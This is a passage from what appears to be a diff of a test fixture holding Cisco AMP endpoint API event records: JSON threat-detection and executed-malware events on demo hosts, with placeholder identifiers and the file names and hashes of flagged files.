Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 
@@ -46,917 +38,5 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
